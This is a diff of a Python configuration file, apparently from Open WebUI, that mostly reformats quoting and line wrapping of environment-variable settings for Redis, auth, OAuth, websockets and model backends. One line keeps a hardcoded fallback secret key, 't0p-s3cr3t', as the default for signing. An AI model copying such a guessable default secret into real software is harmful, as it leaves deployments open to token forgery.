float(DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL) except Exception: DATABASE_USER_ACTIVE_STATUS_UPDATE_INTERVAL = 0.0 # When enabled, get_db_context reuses existing sessions; set to False to always create new sessions -DATABASE_ENABLE_SESSION_SHARING = ( - os.environ.get("DATABASE_ENABLE_SESSION_SHARING", "False").lower() == "true" -) +DATABASE_ENABLE_SESSION_SHARING = 
os.environ.get('DATABASE_ENABLE_SESSION_SHARING', 'False').lower() == 'true' # Enable public visibility of active user count (when disabled, only admins can see it) -ENABLE_PUBLIC_ACTIVE_USERS_COUNT = ( - os.environ.get("ENABLE_PUBLIC_ACTIVE_USERS_COUNT", "True").lower() == "true" -) +ENABLE_PUBLIC_ACTIVE_USERS_COUNT = os.environ.get('ENABLE_PUBLIC_ACTIVE_USERS_COUNT', 'True').lower() == 'true' -RESET_CONFIG_ON_START = ( - os.environ.get("RESET_CONFIG_ON_START", "False").lower() == "true" -) +RESET_CONFIG_ON_START = os.environ.get('RESET_CONFIG_ON_START', 'False').lower() == 'true' -ENABLE_REALTIME_CHAT_SAVE = ( - os.environ.get("ENABLE_REALTIME_CHAT_SAVE", "False").lower() == "true" -) +ENABLE_REALTIME_CHAT_SAVE = os.environ.get('ENABLE_REALTIME_CHAT_SAVE', 'False').lower() == 'true' -ENABLE_QUERIES_CACHE = os.environ.get("ENABLE_QUERIES_CACHE", "False").lower() == "true" +ENABLE_QUERIES_CACHE = os.environ.get('ENABLE_QUERIES_CACHE', 'False').lower() == 'true' -RAG_SYSTEM_CONTEXT = os.environ.get("RAG_SYSTEM_CONTEXT", "False").lower() == "true" +RAG_SYSTEM_CONTEXT = os.environ.get('RAG_SYSTEM_CONTEXT', 'False').lower() == 'true' #################################### # REDIS #################################### -REDIS_URL = os.environ.get("REDIS_URL", "") -REDIS_CLUSTER = os.environ.get("REDIS_CLUSTER", "False").lower() == "true" +REDIS_URL = os.environ.get('REDIS_URL', '') +REDIS_CLUSTER = os.environ.get('REDIS_CLUSTER', 'False').lower() == 'true' -REDIS_KEY_PREFIX = os.environ.get("REDIS_KEY_PREFIX", "open-webui") +REDIS_KEY_PREFIX = os.environ.get('REDIS_KEY_PREFIX', 'open-webui') -REDIS_SENTINEL_HOSTS = os.environ.get("REDIS_SENTINEL_HOSTS", "") -REDIS_SENTINEL_PORT = os.environ.get("REDIS_SENTINEL_PORT", "26379") +REDIS_SENTINEL_HOSTS = os.environ.get('REDIS_SENTINEL_HOSTS', '') +REDIS_SENTINEL_PORT = os.environ.get('REDIS_SENTINEL_PORT', '26379') # Maximum number of retries for Redis operations when using Sentinel fail-over -REDIS_SENTINEL_MAX_RETRY_COUNT = os.environ.get("REDIS_SENTINEL_MAX_RETRY_COUNT", "2") +REDIS_SENTINEL_MAX_RETRY_COUNT = os.environ.get('REDIS_SENTINEL_MAX_RETRY_COUNT', '2') try: REDIS_SENTINEL_MAX_RETRY_COUNT = int(REDIS_SENTINEL_MAX_RETRY_COUNT) if REDIS_SENTINEL_MAX_RETRY_COUNT < 1: @@ -454,15 +419,15 @@ def parse_section(section): REDIS_SENTINEL_MAX_RETRY_COUNT = 2 -REDIS_SOCKET_CONNECT_TIMEOUT = os.environ.get("REDIS_SOCKET_CONNECT_TIMEOUT", "") +REDIS_SOCKET_CONNECT_TIMEOUT = os.environ.get('REDIS_SOCKET_CONNECT_TIMEOUT', '') try: REDIS_SOCKET_CONNECT_TIMEOUT = float(REDIS_SOCKET_CONNECT_TIMEOUT) except ValueError: REDIS_SOCKET_CONNECT_TIMEOUT = None -REDIS_RECONNECT_DELAY = os.environ.get("REDIS_RECONNECT_DELAY", "") +REDIS_RECONNECT_DELAY = os.environ.get('REDIS_RECONNECT_DELAY', '') -if REDIS_RECONNECT_DELAY == "": +if REDIS_RECONNECT_DELAY == '': REDIS_RECONNECT_DELAY = None else: try: @@ -477,192 +442,155 @@ def parse_section(section): #################################### # Number of uvicorn worker processes for handling requests -UVICORN_WORKERS = os.environ.get("UVICORN_WORKERS", "1") +UVICORN_WORKERS = os.environ.get('UVICORN_WORKERS', '1') try: UVICORN_WORKERS = int(UVICORN_WORKERS) if UVICORN_WORKERS < 1: UVICORN_WORKERS = 1 except ValueError: UVICORN_WORKERS = 1 - log.info(f"Invalid UVICORN_WORKERS value, defaulting to {UVICORN_WORKERS}") + log.info(f'Invalid UVICORN_WORKERS value, defaulting to {UVICORN_WORKERS}') #################################### # WEBUI_AUTH (Required for security) #################################### -WEBUI_AUTH = 
os.environ.get("WEBUI_AUTH", "True").lower() == "true" +WEBUI_AUTH = os.environ.get('WEBUI_AUTH', 'True').lower() == 'true' -ENABLE_INITIAL_ADMIN_SIGNUP = ( - os.environ.get("ENABLE_INITIAL_ADMIN_SIGNUP", "False").lower() == "true" -) -ENABLE_SIGNUP_PASSWORD_CONFIRMATION = ( - os.environ.get("ENABLE_SIGNUP_PASSWORD_CONFIRMATION", "False").lower() == "true" -) +ENABLE_INITIAL_ADMIN_SIGNUP = os.environ.get('ENABLE_INITIAL_ADMIN_SIGNUP', 'False').lower() == 'true' +ENABLE_SIGNUP_PASSWORD_CONFIRMATION = os.environ.get('ENABLE_SIGNUP_PASSWORD_CONFIRMATION', 'False').lower() == 'true' #################################### # Admin Account Runtime Creation #################################### # Optional env vars for creating an admin account on startup # Useful for headless/automated deployments -WEBUI_ADMIN_EMAIL = os.environ.get("WEBUI_ADMIN_EMAIL", "") -WEBUI_ADMIN_PASSWORD = os.environ.get("WEBUI_ADMIN_PASSWORD", "") -WEBUI_ADMIN_NAME = os.environ.get("WEBUI_ADMIN_NAME", "Admin") +WEBUI_ADMIN_EMAIL = os.environ.get('WEBUI_ADMIN_EMAIL', '') +WEBUI_ADMIN_PASSWORD = os.environ.get('WEBUI_ADMIN_PASSWORD', '') +WEBUI_ADMIN_NAME = os.environ.get('WEBUI_ADMIN_NAME', 'Admin') -WEBUI_AUTH_TRUSTED_EMAIL_HEADER = os.environ.get( - "WEBUI_AUTH_TRUSTED_EMAIL_HEADER", None -) -WEBUI_AUTH_TRUSTED_NAME_HEADER = os.environ.get("WEBUI_AUTH_TRUSTED_NAME_HEADER", None) -WEBUI_AUTH_TRUSTED_GROUPS_HEADER = os.environ.get( - "WEBUI_AUTH_TRUSTED_GROUPS_HEADER", None -) +WEBUI_AUTH_TRUSTED_EMAIL_HEADER = os.environ.get('WEBUI_AUTH_TRUSTED_EMAIL_HEADER', None) +WEBUI_AUTH_TRUSTED_NAME_HEADER = os.environ.get('WEBUI_AUTH_TRUSTED_NAME_HEADER', None) +WEBUI_AUTH_TRUSTED_GROUPS_HEADER = os.environ.get('WEBUI_AUTH_TRUSTED_GROUPS_HEADER', None) -ENABLE_PASSWORD_VALIDATION = ( - os.environ.get("ENABLE_PASSWORD_VALIDATION", "False").lower() == "true" -) +ENABLE_PASSWORD_VALIDATION = os.environ.get('ENABLE_PASSWORD_VALIDATION', 'False').lower() == 'true' PASSWORD_VALIDATION_REGEX_PATTERN = os.environ.get( - "PASSWORD_VALIDATION_REGEX_PATTERN", - r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^\w\s]).{8,}$", + 'PASSWORD_VALIDATION_REGEX_PATTERN', + r'^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^\w\s]).{8,}$', ) try: - PASSWORD_VALIDATION_REGEX_PATTERN = rf"{PASSWORD_VALIDATION_REGEX_PATTERN}" + PASSWORD_VALIDATION_REGEX_PATTERN = rf'{PASSWORD_VALIDATION_REGEX_PATTERN}' PASSWORD_VALIDATION_REGEX_PATTERN = re.compile(PASSWORD_VALIDATION_REGEX_PATTERN) except Exception as e: - log.error(f"Invalid PASSWORD_VALIDATION_REGEX_PATTERN: {e}") - PASSWORD_VALIDATION_REGEX_PATTERN = re.compile( - r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^\w\s]).{8,}$" - ) + log.error(f'Invalid PASSWORD_VALIDATION_REGEX_PATTERN: {e}') + PASSWORD_VALIDATION_REGEX_PATTERN = re.compile(r'^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[^\w\s]).{8,}$') -PASSWORD_VALIDATION_HINT = os.environ.get("PASSWORD_VALIDATION_HINT", "") +PASSWORD_VALIDATION_HINT = os.environ.get('PASSWORD_VALIDATION_HINT', '') -BYPASS_MODEL_ACCESS_CONTROL = ( - os.environ.get("BYPASS_MODEL_ACCESS_CONTROL", "False").lower() == "true" -) +BYPASS_MODEL_ACCESS_CONTROL = os.environ.get('BYPASS_MODEL_ACCESS_CONTROL', 'False').lower() == 'true' -WEBUI_AUTH_SIGNOUT_REDIRECT_URL = os.environ.get( - "WEBUI_AUTH_SIGNOUT_REDIRECT_URL", None -) +WEBUI_AUTH_SIGNOUT_REDIRECT_URL = os.environ.get('WEBUI_AUTH_SIGNOUT_REDIRECT_URL', None) #################################### # WEBUI_SECRET_KEY #################################### WEBUI_SECRET_KEY = os.environ.get( - "WEBUI_SECRET_KEY", - os.environ.get( - "WEBUI_JWT_SECRET_KEY", 
"t0p-s3cr3t" - ), # DEPRECATED: remove at next major version + 'WEBUI_SECRET_KEY', + os.environ.get('WEBUI_JWT_SECRET_KEY', 't0p-s3cr3t'), # DEPRECATED: remove at next major version ) -WEBUI_SESSION_COOKIE_SAME_SITE = os.environ.get("WEBUI_SESSION_COOKIE_SAME_SITE", "lax") +WEBUI_SESSION_COOKIE_SAME_SITE = os.environ.get('WEBUI_SESSION_COOKIE_SAME_SITE', 'lax') -WEBUI_SESSION_COOKIE_SECURE = ( - os.environ.get("WEBUI_SESSION_COOKIE_SECURE", "false").lower() == "true" -) +WEBUI_SESSION_COOKIE_SECURE = os.environ.get('WEBUI_SESSION_COOKIE_SECURE', 'false').lower() == 'true' -WEBUI_AUTH_COOKIE_SAME_SITE = os.environ.get( - "WEBUI_AUTH_COOKIE_SAME_SITE", WEBUI_SESSION_COOKIE_SAME_SITE -) +WEBUI_AUTH_COOKIE_SAME_SITE = os.environ.get('WEBUI_AUTH_COOKIE_SAME_SITE', WEBUI_SESSION_COOKIE_SAME_SITE) WEBUI_AUTH_COOKIE_SECURE = ( os.environ.get( - "WEBUI_AUTH_COOKIE_SECURE", - os.environ.get("WEBUI_SESSION_COOKIE_SECURE", "false"), + 'WEBUI_AUTH_COOKIE_SECURE', + os.environ.get('WEBUI_SESSION_COOKIE_SECURE', 'false'), ).lower() - == "true" + == 'true' ) -if WEBUI_AUTH and WEBUI_SECRET_KEY == "": +if WEBUI_AUTH and WEBUI_SECRET_KEY == '': raise ValueError(ERROR_MESSAGES.ENV_VAR_NOT_FOUND) -ENABLE_COMPRESSION_MIDDLEWARE = ( - os.environ.get("ENABLE_COMPRESSION_MIDDLEWARE", "True").lower() == "true" -) +ENABLE_COMPRESSION_MIDDLEWARE = os.environ.get('ENABLE_COMPRESSION_MIDDLEWARE', 'True').lower() == 'true' #################################### # OAUTH Configuration #################################### -ENABLE_OAUTH_EMAIL_FALLBACK = ( - os.environ.get("ENABLE_OAUTH_EMAIL_FALLBACK", "False").lower() == "true" -) +ENABLE_OAUTH_EMAIL_FALLBACK = os.environ.get('ENABLE_OAUTH_EMAIL_FALLBACK', 'False').lower() == 'true' -ENABLE_OAUTH_ID_TOKEN_COOKIE = ( - os.environ.get("ENABLE_OAUTH_ID_TOKEN_COOKIE", "True").lower() == "true" -) +ENABLE_OAUTH_ID_TOKEN_COOKIE = os.environ.get('ENABLE_OAUTH_ID_TOKEN_COOKIE', 'True').lower() == 'true' -OAUTH_CLIENT_INFO_ENCRYPTION_KEY = os.environ.get( - "OAUTH_CLIENT_INFO_ENCRYPTION_KEY", WEBUI_SECRET_KEY -) +OAUTH_CLIENT_INFO_ENCRYPTION_KEY = os.environ.get('OAUTH_CLIENT_INFO_ENCRYPTION_KEY', WEBUI_SECRET_KEY) -OAUTH_SESSION_TOKEN_ENCRYPTION_KEY = os.environ.get( - "OAUTH_SESSION_TOKEN_ENCRYPTION_KEY", WEBUI_SECRET_KEY -) +OAUTH_SESSION_TOKEN_ENCRYPTION_KEY = os.environ.get('OAUTH_SESSION_TOKEN_ENCRYPTION_KEY', WEBUI_SECRET_KEY) # Maximum number of concurrent OAuth sessions per user per provider # This prevents unbounded session growth while allowing multi-device usage -OAUTH_MAX_SESSIONS_PER_USER = int(os.environ.get("OAUTH_MAX_SESSIONS_PER_USER", "10")) +OAUTH_MAX_SESSIONS_PER_USER = int(os.environ.get('OAUTH_MAX_SESSIONS_PER_USER', '10')) # Token Exchange Configuration # Allows external apps to exchange OAuth tokens for OpenWebUI tokens -ENABLE_OAUTH_TOKEN_EXCHANGE = ( - os.environ.get("ENABLE_OAUTH_TOKEN_EXCHANGE", "False").lower() == "true" -) +ENABLE_OAUTH_TOKEN_EXCHANGE = os.environ.get('ENABLE_OAUTH_TOKEN_EXCHANGE', 'False').lower() == 'true' #################################### # SCIM Configuration #################################### -ENABLE_SCIM = ( - os.environ.get("ENABLE_SCIM", os.environ.get("SCIM_ENABLED", "False")).lower() - == "true" -) -SCIM_TOKEN = os.environ.get("SCIM_TOKEN", "") -SCIM_AUTH_PROVIDER = os.environ.get("SCIM_AUTH_PROVIDER", "") +ENABLE_SCIM = os.environ.get('ENABLE_SCIM', os.environ.get('SCIM_ENABLED', 'False')).lower() == 'true' +SCIM_TOKEN = os.environ.get('SCIM_TOKEN', '') +SCIM_AUTH_PROVIDER = os.environ.get('SCIM_AUTH_PROVIDER', '') if 
ENABLE_SCIM and not SCIM_AUTH_PROVIDER: log.warning( - "SCIM is enabled but SCIM_AUTH_PROVIDER is not set. " + 'SCIM is enabled but SCIM_AUTH_PROVIDER is not set. ' "Set SCIM_AUTH_PROVIDER to the OAuth provider name (e.g. 'microsoft', 'oidc') " - "to enable externalId storage." + 'to enable externalId storage.' ) #################################### # LICENSE_KEY #################################### -LICENSE_KEY = os.environ.get("LICENSE_KEY", "") +LICENSE_KEY = os.environ.get('LICENSE_KEY', '') LICENSE_BLOB = None -LICENSE_BLOB_PATH = os.environ.get("LICENSE_BLOB_PATH", DATA_DIR / "l.data") +LICENSE_BLOB_PATH = os.environ.get('LICENSE_BLOB_PATH', DATA_DIR / 'l.data') if LICENSE_BLOB_PATH and os.path.exists(LICENSE_BLOB_PATH): - with open(LICENSE_BLOB_PATH, "rb") as f: + with open(LICENSE_BLOB_PATH, 'rb') as f: LICENSE_BLOB = f.read() -LICENSE_PUBLIC_KEY = os.environ.get("LICENSE_PUBLIC_KEY", "") +LICENSE_PUBLIC_KEY = os.environ.get('LICENSE_PUBLIC_KEY', '') pk = None if LICENSE_PUBLIC_KEY: - pk = serialization.load_pem_public_key(f""" + pk = serialization.load_pem_public_key( + f""" -----BEGIN PUBLIC KEY----- {LICENSE_PUBLIC_KEY} -----END PUBLIC KEY----- -""".encode("utf-8")) +""".encode('utf-8') + ) #################################### # MODELS #################################### -ENABLE_CUSTOM_MODEL_FALLBACK = ( - os.environ.get("ENABLE_CUSTOM_MODEL_FALLBACK", "False").lower() == "true" -) +ENABLE_CUSTOM_MODEL_FALLBACK = os.environ.get('ENABLE_CUSTOM_MODEL_FALLBACK', 'False').lower() == 'true' -MODELS_CACHE_TTL = os.environ.get("MODELS_CACHE_TTL", "1") -if MODELS_CACHE_TTL == "": +MODELS_CACHE_TTL = os.environ.get('MODELS_CACHE_TTL', '1') +if MODELS_CACHE_TTL == '': MODELS_CACHE_TTL = None else: try: @@ -676,30 +604,23 @@ def parse_section(section): #################################### ENABLE_CHAT_RESPONSE_BASE64_IMAGE_URL_CONVERSION = ( - os.environ.get("ENABLE_CHAT_RESPONSE_BASE64_IMAGE_URL_CONVERSION", "False").lower() - == "true" + os.environ.get('ENABLE_CHAT_RESPONSE_BASE64_IMAGE_URL_CONVERSION', 'False').lower() == 'true' ) -CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = os.environ.get( - "CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE", "1" -) +CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = os.environ.get('CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE', '1') -if CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE == "": +if CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE == '': CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = 1 else: try: - CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = int( - CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE - ) + CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = int(CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE) except Exception: CHAT_RESPONSE_STREAM_DELTA_CHUNK_SIZE = 1 -CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES = os.environ.get( - "CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES", "30" -) +CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES = os.environ.get('CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES', '30') -if CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES == "": +if CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES == '': CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES = 30 else: try: @@ -708,17 +629,13 @@ def parse_section(section): CHAT_RESPONSE_MAX_TOOL_CALL_RETRIES = 30 -CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = os.environ.get( - "CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE", "" -) +CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = os.environ.get('CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE', '') -if CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE == "": +if CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE == '': CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = None else: try: - CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = int( 
- CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE - ) + CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = int(CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE) except Exception: CHAT_STREAM_RESPONSE_CHUNK_MAX_BUFFER_SIZE = None @@ -727,70 +644,62 @@ def parse_section(section): # WEBSOCKET SUPPORT #################################### -ENABLE_WEBSOCKET_SUPPORT = ( - os.environ.get("ENABLE_WEBSOCKET_SUPPORT", "True").lower() == "true" -) +ENABLE_WEBSOCKET_SUPPORT = os.environ.get('ENABLE_WEBSOCKET_SUPPORT', 'True').lower() == 'true' -WEBSOCKET_MANAGER = os.environ.get("WEBSOCKET_MANAGER", "") +WEBSOCKET_MANAGER = os.environ.get('WEBSOCKET_MANAGER', '') -WEBSOCKET_REDIS_OPTIONS = os.environ.get("WEBSOCKET_REDIS_OPTIONS", "") +WEBSOCKET_REDIS_OPTIONS = os.environ.get('WEBSOCKET_REDIS_OPTIONS', '') -if WEBSOCKET_REDIS_OPTIONS == "": +if WEBSOCKET_REDIS_OPTIONS == '': if REDIS_SOCKET_CONNECT_TIMEOUT: - WEBSOCKET_REDIS_OPTIONS = { - "socket_connect_timeout": REDIS_SOCKET_CONNECT_TIMEOUT - } + WEBSOCKET_REDIS_OPTIONS = {'socket_connect_timeout': REDIS_SOCKET_CONNECT_TIMEOUT} else: - log.debug("No WEBSOCKET_REDIS_OPTIONS provided, defaulting to None") + log.debug('No WEBSOCKET_REDIS_OPTIONS provided, defaulting to None') WEBSOCKET_REDIS_OPTIONS = None else: try: WEBSOCKET_REDIS_OPTIONS = json.loads(WEBSOCKET_REDIS_OPTIONS) except Exception: - log.warning("Invalid WEBSOCKET_REDIS_OPTIONS, defaulting to None") + log.warning('Invalid WEBSOCKET_REDIS_OPTIONS, defaulting to None') WEBSOCKET_REDIS_OPTIONS = None -WEBSOCKET_REDIS_URL = os.environ.get("WEBSOCKET_REDIS_URL", REDIS_URL) -WEBSOCKET_REDIS_CLUSTER = ( - os.environ.get("WEBSOCKET_REDIS_CLUSTER", str(REDIS_CLUSTER)).lower() == "true" -) +WEBSOCKET_REDIS_URL = os.environ.get('WEBSOCKET_REDIS_URL', REDIS_URL) +WEBSOCKET_REDIS_CLUSTER = os.environ.get('WEBSOCKET_REDIS_CLUSTER', str(REDIS_CLUSTER)).lower() == 'true' -websocket_redis_lock_timeout = os.environ.get("WEBSOCKET_REDIS_LOCK_TIMEOUT", "60") +websocket_redis_lock_timeout = os.environ.get('WEBSOCKET_REDIS_LOCK_TIMEOUT', '60') try: WEBSOCKET_REDIS_LOCK_TIMEOUT = int(websocket_redis_lock_timeout) except ValueError: WEBSOCKET_REDIS_LOCK_TIMEOUT = 60 -WEBSOCKET_SENTINEL_HOSTS = os.environ.get("WEBSOCKET_SENTINEL_HOSTS", "") -WEBSOCKET_SENTINEL_PORT = os.environ.get("WEBSOCKET_SENTINEL_PORT", "26379") -WEBSOCKET_SERVER_LOGGING = ( - os.environ.get("WEBSOCKET_SERVER_LOGGING", "False").lower() == "true" -) +WEBSOCKET_SENTINEL_HOSTS = os.environ.get('WEBSOCKET_SENTINEL_HOSTS', '') +WEBSOCKET_SENTINEL_PORT = os.environ.get('WEBSOCKET_SENTINEL_PORT', '26379') +WEBSOCKET_SERVER_LOGGING = os.environ.get('WEBSOCKET_SERVER_LOGGING', 'False').lower() == 'true' WEBSOCKET_SERVER_ENGINEIO_LOGGING = ( os.environ.get( - "WEBSOCKET_SERVER_ENGINEIO_LOGGING", - os.environ.get("WEBSOCKET_SERVER_LOGGING", "False"), + 'WEBSOCKET_SERVER_ENGINEIO_LOGGING', + os.environ.get('WEBSOCKET_SERVER_LOGGING', 'False'), ).lower() - == "true" + == 'true' ) -WEBSOCKET_SERVER_PING_TIMEOUT = os.environ.get("WEBSOCKET_SERVER_PING_TIMEOUT", "20") +WEBSOCKET_SERVER_PING_TIMEOUT = os.environ.get('WEBSOCKET_SERVER_PING_TIMEOUT', '20') try: WEBSOCKET_SERVER_PING_TIMEOUT = int(WEBSOCKET_SERVER_PING_TIMEOUT) except ValueError: WEBSOCKET_SERVER_PING_TIMEOUT = 20 -WEBSOCKET_SERVER_PING_INTERVAL = os.environ.get("WEBSOCKET_SERVER_PING_INTERVAL", "25") +WEBSOCKET_SERVER_PING_INTERVAL = os.environ.get('WEBSOCKET_SERVER_PING_INTERVAL', '25') try: WEBSOCKET_SERVER_PING_INTERVAL = int(WEBSOCKET_SERVER_PING_INTERVAL) except ValueError: WEBSOCKET_SERVER_PING_INTERVAL = 
25 -WEBSOCKET_EVENT_CALLER_TIMEOUT = os.environ.get("WEBSOCKET_EVENT_CALLER_TIMEOUT", "") +WEBSOCKET_EVENT_CALLER_TIMEOUT = os.environ.get('WEBSOCKET_EVENT_CALLER_TIMEOUT', '') -if WEBSOCKET_EVENT_CALLER_TIMEOUT == "": +if WEBSOCKET_EVENT_CALLER_TIMEOUT == '': WEBSOCKET_EVENT_CALLER_TIMEOUT = None else: try: @@ -799,11 +708,11 @@ def parse_section(section): WEBSOCKET_EVENT_CALLER_TIMEOUT = 300 -REQUESTS_VERIFY = os.environ.get("REQUESTS_VERIFY", "True").lower() == "true" +REQUESTS_VERIFY = os.environ.get('REQUESTS_VERIFY', 'True').lower() == 'true' -AIOHTTP_CLIENT_TIMEOUT = os.environ.get("AIOHTTP_CLIENT_TIMEOUT", "") +AIOHTTP_CLIENT_TIMEOUT = os.environ.get('AIOHTTP_CLIENT_TIMEOUT', '') -if AIOHTTP_CLIENT_TIMEOUT == "": +if AIOHTTP_CLIENT_TIMEOUT == '': AIOHTTP_CLIENT_TIMEOUT = None else: try: @@ -812,16 +721,14 @@ def parse_section(section): AIOHTTP_CLIENT_TIMEOUT = 300 -AIOHTTP_CLIENT_SESSION_SSL = ( - os.environ.get("AIOHTTP_CLIENT_SESSION_SSL", "True").lower() == "true" -) +AIOHTTP_CLIENT_SESSION_SSL = os.environ.get('AIOHTTP_CLIENT_SESSION_SSL', 'True').lower() == 'true' AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST = os.environ.get( - "AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST", - os.environ.get("AIOHTTP_CLIENT_TIMEOUT_OPENAI_MODEL_LIST", "10"), + 'AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST', + os.environ.get('AIOHTTP_CLIENT_TIMEOUT_OPENAI_MODEL_LIST', '10'), ) -if AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST == "": +if AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST == '': AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST = None else: try: @@ -830,29 +737,25 @@ def parse_section(section): AIOHTTP_CLIENT_TIMEOUT_MODEL_LIST = 10 -AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = os.environ.get( - "AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA", "10" -) +AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = os.environ.get('AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA', '10') -if AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA == "": +if AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA == '': AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = None else: try: - AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = int( - AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA - ) + AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = int(AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA) except Exception: AIOHTTP_CLIENT_TIMEOUT_TOOL_SERVER_DATA = 10 AIOHTTP_CLIENT_SESSION_TOOL_SERVER_SSL = ( - os.environ.get("AIOHTTP_CLIENT_SESSION_TOOL_SERVER_SSL", "True").lower() == "true" + os.environ.get('AIOHTTP_CLIENT_SESSION_TOOL_SERVER_SSL', 'True').lower() == 'true' ) -RAG_EMBEDDING_TIMEOUT = os.environ.get("RAG_EMBEDDING_TIMEOUT", "") +RAG_EMBEDDING_TIMEOUT = os.environ.get('RAG_EMBEDDING_TIMEOUT', '') -if RAG_EMBEDDING_TIMEOUT == "": +if RAG_EMBEDDING_TIMEOUT == '': RAG_EMBEDDING_TIMEOUT = None else: try: @@ -866,210 +769,158 @@ def parse_section(section): #################################### -SENTENCE_TRANSFORMERS_BACKEND = os.environ.get("SENTENCE_TRANSFORMERS_BACKEND", "") -if SENTENCE_TRANSFORMERS_BACKEND == "": - SENTENCE_TRANSFORMERS_BACKEND = "torch" +SENTENCE_TRANSFORMERS_BACKEND = os.environ.get('SENTENCE_TRANSFORMERS_BACKEND', '') +if SENTENCE_TRANSFORMERS_BACKEND == '': + SENTENCE_TRANSFORMERS_BACKEND = 'torch' -SENTENCE_TRANSFORMERS_MODEL_KWARGS = os.environ.get( - "SENTENCE_TRANSFORMERS_MODEL_KWARGS", "" -) -if SENTENCE_TRANSFORMERS_MODEL_KWARGS == "": +SENTENCE_TRANSFORMERS_MODEL_KWARGS = os.environ.get('SENTENCE_TRANSFORMERS_MODEL_KWARGS', '') +if SENTENCE_TRANSFORMERS_MODEL_KWARGS == '': SENTENCE_TRANSFORMERS_MODEL_KWARGS = None else: try: - SENTENCE_TRANSFORMERS_MODEL_KWARGS = json.loads( - SENTENCE_TRANSFORMERS_MODEL_KWARGS - ) + 
SENTENCE_TRANSFORMERS_MODEL_KWARGS = json.loads(SENTENCE_TRANSFORMERS_MODEL_KWARGS) except Exception: SENTENCE_TRANSFORMERS_MODEL_KWARGS = None -SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND = os.environ.get( - "SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND", "" -) -if SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND == "": - SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND = "torch" +SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND = os.environ.get('SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND', '') +if SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND == '': + SENTENCE_TRANSFORMERS_CROSS_ENCODER_BACKEND = 'torch' SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = os.environ.get( - "SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS", "" + 'SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS', '' ) -if SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS == "": +if SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS == '': SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = None else: try: - SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = json.loads( - SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS - ) + SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = json.loads(SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS) except Exception: SENTENCE_TRANSFORMERS_CROSS_ENCODER_MODEL_KWARGS = None # Whether to apply sigmoid normalization to CrossEncoder reranking scores. # When enabled (default), scores are normalized to 0-1 range for proper # relevance threshold behavior with MS MARCO models. SENTENCE_TRANSFORMERS_CROSS_ENCODER_SIGMOID_ACTIVATION_FUNCTION = ( - os.environ.get( - "SENTENCE_TRANSFORMERS_CROSS_ENCODER_SIGMOID_ACTIVATION_FUNCTION", "True" - ).lower() - == "true" + 